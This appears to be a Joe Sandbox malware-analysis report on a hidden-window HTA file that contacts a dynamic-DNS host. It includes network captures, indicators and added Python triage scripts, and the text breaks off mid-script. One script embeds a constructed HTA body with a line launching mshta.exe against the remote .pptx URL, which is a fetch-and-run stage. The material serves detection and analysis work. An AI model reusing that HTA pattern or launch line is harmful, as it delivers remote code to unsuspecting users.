  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxm: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxy.IE5R;: 0%, safe
  • https://www.crimea.kp.ru/daily/euromaidan/x: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxN: 0%, safe
  • https://passport.i.ua/login/?: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l: 0%, safe
  • https://www.crimea.kp.ru/daily/euromaidan/: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxC:: 0%, safe
  • http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx?: 0%, safe


Contacted domains:
  Name                 | IP              | Active | Malicious | Antivirus Detection | Reputation
  papilutes.hopto.org  | 193.124.22.113  | true   | false     |                     | unknown

Contacted URLs:
  Name                                                            | Malicious | Antivirus Detection   | Reputation
  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx   | false     | Avira URL Cloud: safe | unknown
URLs from memory and binary strings (Name / Source / Malicious / Antivirus Detection / Reputation):

  https://t.me/
    Source: mshta.exe (00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290442821.0000000000751000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxm
    Source: mshta.exe (00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxl
    Source: mshta.exe (00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://developer.mozilla.org/en-US/docs/Web/JavaScriptX
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Reputation: high

  http://papilutes.hopto.org
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://regnum.ru/foreign/eastern-europe/ukraine.html
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294642550.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  https://www.bbc.com/
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  https://regnum.ru/foreign/eastern-europe/ukraine.htmlHTA.hta#
    Source: mshta.exe (00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Reputation: high

  https://developer.mozilla.org/en-US/docs/Web/JavaScript
    Source: mshta.exe (00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  https://www.ukr.net/
    Source: mshta.exe (00000000.00000003.1291320484.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294642550.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  https://t.me/G
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Reputation: high

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxd
    Source: mshta.exe (00000001.00000002.2522588226.0000000000AA9000.00000004.00000010.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxy.IE5R;
    Source: mshta.exe (00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://www.ukr.net/o
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Reputation: high

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxN
    Source: mshta.exe (00000001.00000002.2522777705.000000000312E000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwE
    Source: mshta.exe (00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290442821.000000000076D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  https://www.crimea.kp.ru/daily/euromaidan/x
    Source: mshta.exe (00000000.00000003.1288694322.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1291320484.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294642550.0000000000780000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000780000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://passport.i.ua/login/?
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://www.unian.net/
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294722604.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC8000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx=
    Source: mshta.exe (00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://www.rbc.ru/tags/?tag=
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1290836756.0000000005BC3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Reputation: high

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx?
    Source: mshta.exe (00000001.00000002.2522777705.0000000003170000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptxC:
    Source: mshta.exe (00000000.00000002.1294457111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 00000001.00000002.2522741582.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, 00000001.00000002.2522777705.0000000003110000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwE3PM41zeMBWfPn
    Source: mshta.exe (00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Reputation: high

  https://www.crimea.kp.ru/daily/euromaidan/
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.000000000076E000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292771587.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1291320484.00000000007A9000.00000004.00000020.00020000.00000000.sdmp), 2-12749-25_21.04.2025.HTA.hta
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  http://papilutes.hopto.org/Gurukr/cableW2l
    Source: mshta.exe (00000000.00000003.1290228062.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1292410893.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294015422.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1294739881.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1288694322.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1294228164.00000000007BD000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown

  https://meta.ua/news/all/?gclid=EAIaIQobChMImYXApMKt-QIVsRJ7Ch26PwmoEAAYAiAAEgKMyPD_BwEB
    Source: mshta.exe (00000000.00000003.1290836756.0000000005BCC000.00000004.00000020.00020000.00000000.sdmp)
    Malicious: false | Reputation: high
Contacted IPs:
  IP              | Domain               | Country            | ASN   | ASN Name  | Malicious
  193.124.22.113  | papilutes.hopto.org  | Russian Federation | 20853 | ETOP-ASPL | false
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1671026
                                Start date and time:2025-04-22 14:27:18 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 10s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:2-12749-25_21.04.2025.HTA.hta
                                Detection:CLEAN
                                Classification:clean2.winHTA@3/0@1/1
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .hta
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 184.29.183.29, 4.175.87.197
                                • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 2004 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
Time      | Type            | Description
08:28:08  | API Interceptor | 1x Sleep call for process: mshta.exe modified
                                No context
                                No context
ASN context: other samples previously seen contacting ETOP-ASPL (AS20853)
  Match      | Associated Sample Name / URL                                                                | Detection | Threat Name   | Context
  ETOP-ASPL  | http://e9ccawf5esyyffhp.premilkyway.com                                                     | malicious | Unknown       | 217.147.172.104
  ETOP-ASPL  | 511511625.exe                                                                               | malicious | Xmrig         | 194.58.33.244
  ETOP-ASPL  | Update 124.0.6367.158.js                                                                    | malicious | Unknown       | 45.150.65.147
  ETOP-ASPL  | https://l24.im/RBD8OoV                                                                      | malicious | Unknown       | 185.30.124.158
  ETOP-ASPL  | botnet.mips.elf                                                                             | malicious | Mirai, Moobot | 31.31.174.7
  ETOP-ASPL  | Fantazy.arm7.elf                                                                            | malicious | Mirai         | 193.108.114.239
  ETOP-ASPL  | RsE1ko6qPW.cmd                                                                              | malicious | Xmrig         | 194.58.33.244
  ETOP-ASPL  | http://t6ceb4773.emailsys2a.net/c/258/8051645/427/0/475433/1/7220/750cd846a5.html          | malicious | Unknown       | 185.73.228.142
  ETOP-ASPL  | loligang.ppc.elf                                                                            | malicious | Mirai         | 79.133.198.95
  ETOP-ASPL  | resources.dll                                                                               | malicious | DanaBot       | 195.133.88.98
                                No context
                                No context
                                No created / dropped files found
                                File type:HTML document, ASCII text, with CRLF line terminators
                                Entropy (8bit):6.034386209596189
                                TrID:
                                • HyperText Markup Language (15015/1) 55.58%
                                • HyperText Markup Language (12001/1) 44.42%
                                File name:2-12749-25_21.04.2025.HTA.hta
                                File size:6'488 bytes
                                MD5:d8eb78d2145229db1a588a24cf632985
                                SHA1:17c5a033e6d0f99218b0d0bb6a18b6aed3e0a9c3
                                SHA256:341435e34c6d146cbb28f4e7de6d2e0e2b7ec2be3625f14a56041124f4af34cd
                                SHA512:6c1914494da3bc453d53e884a58e28d8a9f93405cd6d1e7987c30a8f2b0f585d0af24772a54625ef7b4a1046cf2ec7749e2fd8f644779f23db4893080bd8f8bf
                                SSDEEP:192:2rYfvko4GQ85LC0He/53fOGFPfIbUzJ+U2QDo/:2Gv8GQ8M2e/53HZmUzJPnDo/
                                TLSH:3CD14AEF6C6346AD53256CD9C1121D0BDF1256A5FEA324A7F218BF349221D58318EC3D
File Content Preview (CRLF line endings shown as line breaks; the report's preview is cut off after "Crea"):
  <!DOCTYPE html>
  <html>
  <head>
  <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
  <script type="text/vbscript">
  On Error Resume Next
  specialistM95 = "rHKv918Cef852ky5Q846xSwCrDTX"

  Set lastlyoNC = Crea
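The preview above shows the two things that matter in this file: an HTA:APPLICATION tag whose attributes hide the window (minimized, no taskbar entry, no system menu, no caption, icon "#"), and a VBScript block that opens with On Error Resume Next before creating a COM object. The static triage below is an added example written for this page, not code from the sample or from Joe Sandbox; it pulls those indicators out of an HTA and lists any URLs in the script. The HTA text it runs on is constructed: its first lines are the preview verbatim, and everything after the blank line is a stand-in body that only reproduces the behaviour the report records (a child mshta.exe launched with the remote .pptx URL). The real sample's code after "Crea" is not on this page and is not reproduced here.

```python
import re

# Constructed test input. The first seven lines reproduce the report's
# "File Content Preview" (CRLF line endings, matching the report's file type).
# Everything after the blank line is NOT the sample's code: the preview stops
# at "Set lastlyoNC = Crea", so the body below is a stand-in written for this
# example that only reproduces the behaviour the report records (a second
# mshta.exe started with the remote .pptx URL).
SAMPLE_HTA = "\r\n".join([
    '<!DOCTYPE html>',
    '<html>',
    '<head>',
    '<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />',
    '<script type="text/vbscript">',
    'On Error Resume Next',
    'specialistM95 = "rHKv918Cef852ky5Q846xSwCrDTX"',
    '',
    'Set sh = CreateObject("WScript.Shell")',                                                     # constructed
    'sh.Run "mshta.exe http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx", 0, False',  # constructed
    'window.close',                                                                               # constructed
    '</script>',
    '</head>',
    '<body></body>',
    '</html>',
])

# HTA:APPLICATION attribute values that together make the window invisible to the user.
HIDDEN_WINDOW_ATTRS = {
    "windowstate": "minimize",
    "showintaskbar": "no",
    "sysmenu": "no",
    "caption": "no",
}
ATTR_RE = re.compile(r'([\w:]+)\s*=\s*"([^"]*)"')
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)


def hta_application_attrs(text):
    """Attributes of the <HTA:APPLICATION> tag, keys lower-cased; {} if absent."""
    m = re.search(r'<HTA:APPLICATION\b([^>]*)>', text, re.I)
    if not m:
        return {}
    return {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}


def script_blocks(text):
    """(language, body) for every <script> block; the HTA default engine is JScript."""
    blocks = []
    for m in re.finditer(r'<script\b([^>]*)>(.*?)</script>', text, re.I | re.S):
        attrs = {k.lower(): v.lower() for k, v in ATTR_RE.findall(m.group(1))}
        lang = attrs.get("language") or attrs.get("type") or "jscript"
        blocks.append((lang, m.group(2)))
    return blocks


def triage_hta(text):
    """Static indicators for an HTA: hidden window, VBScript, silenced errors, COM objects, URLs."""
    attrs = hta_application_attrs(text)
    findings = []
    hidden = [k for k, v in HIDDEN_WINDOW_ATTRS.items() if attrs.get(k, "").lower() == v]
    if len(hidden) >= 2:
        findings.append("hidden window: " + ", ".join(f"{k}={attrs[k]}" for k in hidden))
    if attrs.get("icon") == "#":
        findings.append('icon="#" (no icon resource)')
    urls = set()
    for lang, body in script_blocks(text):
        if "vbscript" in lang:
            findings.append("VBScript block")
        if re.search(r"\bOn\s+Error\s+Resume\s+Next\b", body, re.I):
            findings.append("On Error Resume Next (errors silenced)")
        for prog_id in re.findall(r'CreateObject\s*\(\s*"([^"]+)"', body, re.I):
            findings.append(f'CreateObject("{prog_id}")')
        if re.search(r"\bmshta(\.exe)?\b", body, re.I):
            findings.append("launches mshta.exe from script")
        urls.update(URL_RE.findall(body))
    return {"attrs": attrs, "findings": findings, "urls": sorted(urls)}


if __name__ == "__main__":
    result = triage_hta(SAMPLE_HTA)
    for line in result["findings"]:
        print("-", line)
    print("URLs:", result["urls"])
```

The hidden-window check deliberately requires two or more of the four attributes, since a single WINDOWSTATE="minimize" also occurs in legitimate admin HTAs; the combination with SHOWINTASKBAR="no" and CAPTION="no" is what leaves the user with nothing to click on.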


                                • Total Packets: 11
                                • 80 (HTTP)
                                • 53 (DNS)
TCP packets:
  Timestamp                             | Source Port | Dest Port | Source IP       | Dest IP
  Apr 22, 2025 14:28:10.204953909 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:28:10.510243893 CEST  | 80          | 49689     | 193.124.22.113  | 192.168.2.5
  Apr 22, 2025 14:28:10.510904074 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:28:10.511223078 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:28:10.816183090 CEST  | 80          | 49689     | 193.124.22.113  | 192.168.2.5
  Apr 22, 2025 14:28:11.283572912 CEST  | 80          | 49689     | 193.124.22.113  | 192.168.2.5
  Apr 22, 2025 14:28:11.283900023 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:28:16.285518885 CEST  | 80          | 49689     | 193.124.22.113  | 192.168.2.5
  Apr 22, 2025 14:28:16.285578012 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:29:59.950443029 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:30:00.699595928 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:30:02.199598074 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:30:05.199594021 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113
  Apr 22, 2025 14:30:11.184081078 CEST  | 49689       | 80        | 192.168.2.5     | 193.124.22.113

UDP packets:
  Timestamp                             | Source Port | Dest Port | Source IP    | Dest IP
  Apr 22, 2025 14:28:09.982322931 CEST  | 51461       | 53        | 192.168.2.5  | 1.1.1.1
  Apr 22, 2025 14:28:10.172990084 CEST  | 53          | 51461     | 1.1.1.1      | 192.168.2.5

DNS queries:
  Timestamp                             | Source IP    | Dest IP  | Trans ID | OP Code            | Name                 | Type           | Class        | DNS over HTTPS
  Apr 22, 2025 14:28:09.982322931 CEST  | 192.168.2.5  | 1.1.1.1  | 0x8975   | Standard query (0) | papilutes.hopto.org  | A (IP address) | IN (0x0001)  | false

DNS answers:
  Timestamp                             | Source IP  | Dest IP      | Trans ID | Reply Code   | Name                 | CName | Address         | Type           | Class        | DNS over HTTPS
  Apr 22, 2025 14:28:10.172990084 CEST  | 1.1.1.1    | 192.168.2.5  | 0x8975   | No error (0) | papilutes.hopto.org  |       | 193.124.22.113  | A (IP address) | IN (0x0001)  | false
HTTP sessions with papilutes.hopto.org:
  Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
  0          | 192.168.2.5  | 49689       | 193.124.22.113  | 80               | 2004 | C:\Windows\SysWOW64\mshta.exe

Apr 22, 2025 14:28:10.511223078 CEST, 337 bytes, OUT:
GET /Gurukr/cableW2l/comparableKrE.pptx HTTP/1.1
                                Accept: */*
                                Accept-Language: en-CH
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: papilutes.hopto.org
                                Connection: Keep-Alive
Apr 22, 2025 14:28:11.283572912 CEST, 201 bytes, IN:
HTTP/1.1 200 OK
                                Date: Tue, 22 Apr 2025 12:28:10 GMT
                                Server: Apache/2.4.62 (Debian)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/postscript
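The exchange above is the entire second stage as the sandbox saw it: mshta.exe requested a .pptx path from a No-IP dynamic-DNS host using the IE-compatibility user agent that WinINet/urlmon sends on behalf of non-browser clients, and the server answered 200 OK with Content-Length: 0 and a Content-Type of application/postscript. The script below is an added example, not part of the report or the sample, that parses the two captured messages (re-typed with CRLF line endings) and turns those observations into findings. The dynamic-DNS zone list, the browser list and the expected MIME types are small tables written for this example, not data from the report.

```python
# Constructed inputs: the two messages the report captured on HTTP session 0
# (PID 2004, C:\Windows\SysWOW64\mshta.exe -> papilutes.hopto.org:80), re-typed
# with CRLF line endings so the parser can run offline.
RAW_REQUEST = (
    "GET /Gurukr/cableW2l/comparableKrE.pptx HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-CH\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: papilutes.hopto.org\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
RAW_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 22 Apr 2025 12:28:10 GMT\r\n"
    "Server: Apache/2.4.62 (Debian)\r\n"
    "Content-Length: 0\r\n"
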